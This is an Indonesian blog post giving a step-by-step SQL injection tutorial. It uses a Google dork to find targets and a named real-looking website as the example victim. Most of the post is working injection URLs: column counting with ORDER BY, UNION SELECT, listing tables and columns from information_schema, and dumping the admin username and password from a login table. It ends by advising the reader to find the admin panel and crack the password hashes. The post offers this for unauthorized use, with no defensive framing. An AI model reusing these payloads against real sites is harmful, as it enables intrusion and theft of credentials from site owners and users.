SQLi Step By Step :)

Posted by ngadimin On Sabtu, 26 November 2011 0 komentar
Ok, Langsung aja gak usah banyak basa basi, ntar malah tambah basi . ..

1- Cari Target Di google dulu Pake dork nya terserah ente kalo di contoh ini, ane pake dork ini inurl:"news_id.php?id="

2- Kalo udah Nemu, Langsung di Check aja pake tanda ( ' ) di akhir url nya.Contoh :
http://luckyinternational.net/news/news_id.php?id=22
msukin tanda ( ' ) di akhir url nya sehingga jadi kaya gini :
http://luckyinternational.net/news/news_id.php?id=22'
Truzz . . ntar bakalan keluar error tapi gak usah di peduliin error nya . . . soal nya fungsi nya cuman buat nyari tau aja, apakah website tersebut bisa di SQLi apa gak . . . kalo keluar error, berarti bisa ... tapi ada juga lo yang gak keluar error tapi bisa di SQLi !!! ( Explor Your Brain )

3- ok saat nya exploitasi . . !!! menggunkan perintah order+by+1-- Contoh :

http://luckyinternational.net/news/news_id.php?id=22+order+by+1-- = Error nya ilang
http://luckyinternational.net/news/news_id.php?id=22+order+by+2-- = Error nya ilang
http://luckyinternational.net/news/news_id.php?id=22+order+by+3-- = Error nya ilang
http://luckyinternational.net/news/news_id.php?id=22+order+by+4-- = Error nya ilang
http://luckyinternational.net/news/news_id.php?id=22+order+by+5-- = Error nya ilang
http://luckyinternational.net/news/news_id.php?id=22+order+by+6-- = Muncul Error !!

Berarti ada 5 Column lanjut ke step Selanjut nya

4- menggunakan perintah union+all+select+1,2,3,4,5-- Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,5--
Hasil nya, bakalan muncul NOMER AJAIB !!!
fungsi buat inject web tersebut . . .

5- Menggunakan Perintah version() untuk melihat versi database MySQL nya !! Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,version()--

nah ntar di website tersebut bakalan muncul versi database MySQL nya.

6- Menggunakan Perintah group_concat(table_name) trus di tambahain perintah ini
+from+information_schema.tables+where+table_schema=database()-- 
Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--
nah, ntar disitu(di website nya bakalan keluar table table yang ada di database nya, truz ente cari table yang sekiranya itu buat nyimpen username ama password nya si admin ato si user . di contoh ini, ane ngambil table login habis itu ntar table nya di convert ke hexa pake tool ini ntar hasil nya kita pake di prosess selanjutnya

7- menggunkan perintah group_concat(column_name) dan di tambah perintah :
+from+information_schema.columns+where+table_name=0x hexa dari table-- 
Contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,group_concat(column_name)+from+information_schema.tables+where+table_name=0x6c6f67696e-- 

nah . .. ntar di situ bakalan muncul column column dari table login .

8- melihat isi column dari table login contoh :
http://luckyinternational.net/news/news_id.php?id=-22+union+all+select+1,2,3,4,group_concat(username,0x3a,password)+from+login--

tara !!!!! user name ama password udah keluar !!!! seperti di contoh ini !! username ama password dari admin gak di encrypt. tapi biasa nya username ama password di encrypt menggunakn MD5 kalo gak ya SH1

ok . . .. username ama password udah ketemu . .. berarti ente tinggal nyari halaman admin ama decrypt password (bagi yang password nya di encrypt lo)

Sekian dulu ... wasalam

0 komentar:

Posting Komentar